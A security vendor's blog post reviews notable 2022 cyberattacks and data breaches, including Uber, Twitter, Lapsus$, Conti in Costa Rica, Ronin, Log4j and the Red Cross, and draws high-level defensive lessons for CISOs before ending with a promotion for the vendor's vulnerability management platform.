CISO
CYBER ATTACKS
DATA BREACHES

Lessons that a CISO learns in 2022

Pallavi Vishwakarma
July 12, 2023

The year 2022 has been turbulent for cybersecurity all throughout the world. Russia invaded Ukraine, and continuous new debacles and emerging threats unfolded throughout the year. Additionally, we witnessed the first-ever prison term for a security head who hid a data breach. There were more than 4,100 publicly reported data breaches, exposing around 22 billion records. 

Corresponding are the lessons learned by CISO from cyberattacks, threats, and data breaches that occurred in 2022. 

1. Uber: December 2022

In a single year, uber has been a victim of two attacks first in the month of September when the hacker posted a message in the company slack stating they have experienced a data breach and the other was in the month of December when the hacker stole the data of over 70,000 uber employees.

On December 12th, 2022, Uber made a statement claiming that a hacker using the alias "UberLeaks" had obtained the personal information of over 70,000 Uber employees and was publishing it online. Teqtivity, a tech asset management company, is said to have had its mobile device management hijacked, which is why they believe this data breach happened.

The previous attack was in mid-September when the hacker posted in the company's Slack organization, "I am a hacker and Uber has experienced a data breach," followed by multiple emojis. In order to investigate the situation further, the corporation had to shut down its internal communications system and engineering systems.

The hacker also asserted that he was able to access numerous company databases, including those containing message data. Uber alerted law enforcement after learning that a hacker had gained access to an employee's account. Uber had previously been the target of cyberattacks but neglected to alert the authorities, which led to a court struggle and costly penalties.

Security experts need to be aware that, if improperly guarded, security products could end up doing more harm than good. Designing and implementing security rules that encompass such risk requires considerable attention from security teams.

2. Twitter confirms data from 5.4 million accounts was stolen: July 2022

On the hacking forum BreachForums in July 2022, a hacker using the handle "devil" announced that they were selling the data from 5.4 million Twitter accounts.

Email addresses and phone numbers from "celebrities, businesses, randoms, and OGs" were among the stolen data. The term "OGs" refers to Twitter handles that are either brief, made up of one or two letters, or a desirable word for a screen name, such as the first name without any misspellings, numerals, or punctuation. No offers "lower than [$30,000]" would be considered for the database, according to the hacker "devil."

A Twitter vulnerability that was identified in January 2022 led to the data breach.

Establishing and enforcing a tight access control policy is essential to safeguarding your company against insider threats. The organization should do thorough background checks and solid referrals prior to recruiting any new employees.

3. Microsoft Data breach: March 2022

Microsoft was the subject of a hacking operation named Lapsus$ on March 20, 2022. By hacking Microsoft, the hackers compromised Cortana, Bing, and several other services, according to a screenshot they released on Telegram.

Microsoft material was stolen by the hackers as well, although by March 22nd Microsoft had declared that the hacking attempt had been quickly stopped and that only one account had been accessed.

In this instance, Microsoft benefited from the attention its strong security response garnered. Microsoft's security team was prepared because the Lapsus$ organization had previously targeted Nvidia, Samsung, and numerous other businesses.

This attack serves as an excellent example of the value of educating staff members about phishing and other social engineering techniques.

4. Conti Costa Rica Emergency: April 2022

In April, the cybergang Conti, which has ties to Russia, was able to seriously disrupt financial activity all around Costa Rica. They managed to destroy Costa Rica's import and export industry by attacking the Ministry of Finance. This was the first ransomware attack to result in the declaration of a national emergency.

According to Bleeping Computer, Conti has released approximately 97% of a 672GB data dump that purportedly comprises information that was taken from federal entities as of May 9th. Conti has the potential to create and smuggle copies of any encrypted data, turning a ransomware campaign into an extortion effort even after the contents have been decrypted.

Large-scale attacks like the one in Costa Rica are bound to happen again. When you don't prepare, you prepare to fail. Perform a network security assessment. Examine and test your current security measures to see where they might be improved. Look for weaknesses that are frequently missed, and fix them.

5. Cash App Data Breach: April 2022

Cash App revealed that a former employee had accessed their servers in April 2022. It was obvious that the hacker had serious beef with the company. Along with a tonne of other very sensitive financial data, the attack involved client names, stock trading information, account numbers, and portfolio values.

Block owns this popular mobile payment tool and has not yet said how many people were impacted by the breach, but the business has notified more than 8 million customers about it. Fortunately, no account information was taken during the attempt, and the hacker only took a small quantity of personally identifiable data.

The use of behavioral analytics for authentication, access, and authorization by correlating numerous signals and endpoint certification for current security postures is crucial.

6. Ronin: April 2022

Ronin's Axie Infinity game, allows users to earn digital cash and NFTs, causing the company to relax its security precautions in order to accommodate an expanding user base. Later on, Ronin revealed that they had been compromised for $540 million in April 2022. In addition to losing that money, they also had to pay their consumers back for what they had lost.

Ronin’s parent company is working with authorities to identify the culprits and recover funds, but it’s a lesson that any business can learn: never compromise your security standards.

A lesson learned here in 2022 is that developers or corporations shouldn't try to generalize security and see it as a solution that can be applied to all assets or resources

7. Ukraine war: February 2022

Cyberwarfare is a common first step in modern conflict, and it can take many forms, such as information manipulation, attacks on infrastructure, meddling in elections, and reconnaissance. Years of digital disinformation and cyberattacks by their Russian rivals served as the foundation for the physical battle in Ukraine. After these assaults turned destructive, sending troops on the ground to launch an invasion, they were directed at critical service objectives.

Since the crisis began, Ukraine has launched its own cyberattacks. They established a volunteer "IT Army," which used a website listing hostnames and/or IP addresses of Russian targets, and has resulted in several data breaches and service outages inside of Russia (often via distributed denial of service (DDoS) attacks).

Don't wait for a major cyberwar between nations with strong offensive cybersecurity teams to determine whether your company's security posture is capable of withstanding common threats and attacks.

8. Log4j crisis: January 2022

Log4j is a Java library widely used in business systems and web applications, despite Java's declining consumer appeal. Researchers informed WIRED on Friday that they anticipate numerous popular services to be impacted.

Hundreds of millions of devices were impacted by Log4Shell, which was portrayed as a serious technological emergency that would almost surely be used by attackers all over the world.

All it takes for an attacker to take advantage of the vulnerability is to send a well-chosen malicious code string, which Log4j version 2.0 or higher will eventually log. An attacker can get control of a server by loading any Java code they want thanks to the exploit.

This incident made the organization consider why it is crucial to understand your attack surface and to make sure that security is always top of mind for the entire organization. Companies began putting more effort into monitoring open-source software because they realized the damage that could arise from putting unfounded trust in the origins and caliber of the software they are utilizing.

9. Crypto.com Breach: January 2022

The hack, which targeted roughly 500 people's cryptocurrency wallets, happened on January 17. In one instance, hackers stole cryptocurrency worth about $18 million in Bitcoin, $15 million in Ethereum, and other currencies. The ability of the hackers to get beyond two-factor authentication and access customers' wallets was largely responsible for this being made possible. This is yet another illustration of the need of having a password manager.

One of the most secure methods of a transaction processing is the blockchain model, which has long held this reputation. However, this hasn't stopped hackers from attempting to compromise crypto-based transactions.

Crypto.com initially brushed it off as merely an "incident," but later withdrew that claim, admitting that money had indeed been taken and that the affected users had been compensated. The business added that it had reviewed its systems and worked to strengthen its security posture.

Attacks like these brought on by unauthorized access show how vulnerable enterprises are to a typical castle-and-moat approach to network security. The company must implement zero-trust security, in which nobody is presumed to be trustworthy, whether they are inside or outside of a network.

10. Red Cross: January 2022

It seems unlikely that someone would wish to attack the Red Cross, but it did so in January 2022. More than 500,000 pieces of information were exposed in an attack on a third-party contractor, including records deemed "extremely susceptible" by the Red Cross.

In the end, thousands of people had their private information taken, and the majority of the victims are presently missing or in danger. In order to stop the attack and look into this ostensibly political breach, the Red Cross pulled servers offline. However, no one has been blamed.

Transparency has constantly been a key strategy in its responses to data breaches. This practice helps to protect their reputation, while also empowering the affected individuals to protect themselves.

11. Healthcare: A Continued Top Target

All year long, there were numerous attacks on healthcare providers. Due to the diversity of valuable data these businesses often handle and maintain, criminals have targeted healthcare firms for a long time. Since these attacks can benefit cybercriminals in a number of ways, the stakes have increased recently.

Some of the attacks are:

Over the summer, the Baptist Health System of Texas made public an important security lapse that resulted in a large loss of confidential patient information.

On October 25, 2022, health insurance Medibank disclosed that over 4 million of their client's data had been compromised. The name, address, date of birth, and even the insurance card numbers might have been accessed, according to the Australian health insurer.

Later in the year, another incident where an employee improperly accessed the EHR (Electronic Health Records) system came to light, underscoring the danger of internal threats.

Healthcare institutions require more stringent security systems since they are a target for cybercrime. The security toolkit must include safeguarding firewalls, anti-malware programs, data encryption, and other technologies.

Conclusion

These and other incidents have altered the corporate environment, forcing CISOs to navigate choppy waters. The organization learned the lesson that they should put more effort into keeping track of open-source software, it is important to have an up-to-date security posture and also to increase the company security budget.

One of the most crucial lessons we have learned this year is that a business' competitiveness, financial position, and market growth can actually be slowed down or jeopardized by adopting a completely reactive approach to cybersecurity.

SecOps Solution is an award-winning agent-less Full-stack Vulnerability and Patch Management Platform that helps organizations identify, prioritize and remediate security vulnerabilities and misconfigurations in seconds.

To schedule a demo, just pick a slot that is most convenient for you.

Related Blogs